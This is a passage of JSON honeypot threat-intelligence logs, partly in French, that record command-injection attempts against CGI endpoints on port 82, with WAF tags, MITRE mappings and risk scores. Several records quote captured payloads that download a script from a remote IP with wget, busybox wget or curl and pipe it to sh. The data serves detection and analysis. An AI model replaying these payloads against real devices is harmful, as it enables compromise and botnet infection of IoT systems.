\u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nConnection: close\\r\\n\\r\\nsetCookie=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxsc;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nConnection: close\\r\\n\\r\\nsetCookie=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxsc;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00227ac3fd0c3be7066b032998cf69534b9dd2c4d727\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/export-cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/export-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":317},{"id":11809394,"ip":"45.153.34.219","ts":"2026-07-14 02:18:17.000000","proto":"tcp","src_port":54890,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_help-cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00224470cfe23acda62fbb5ae9d06314c68f4f66bdc0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 316, \u0022payload_entropy\u0022: 5.228773272268003, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c646f31985be564f8ea585a35c4a8c6b8894c061\u0022, \u0022event_fingerprint\u0022: \u00221225424e646c7039e317736a8e815ed0d43a2d80\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c4d232c73ce06e25701f11d48cc27aa8\u0022, \u0022path_pattern_hash\u0022: \u0022081a0659a19fb0d32ca77af7f68355fe\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228557794c5c44ff1bde432ad6f13b24651734da35\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":316},{"id":11809395,"ip":"45.153.34.219","ts":"2026-07-14 02:18:17.000000","proto":"tcp","src_port":54900,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":60,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022099cdff692d53e863101007eec84a42f224aacbc\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 306, \u0022payload_entropy\u0022: 5.193131006243552, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022940d196bc21c3a03e5b9f44a68b442105f7ab6d6\u0022, \u0022event_fingerprint\u0022: \u00222effdb138f4ca9b1f8fecb4794e8401f54cc7210\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde 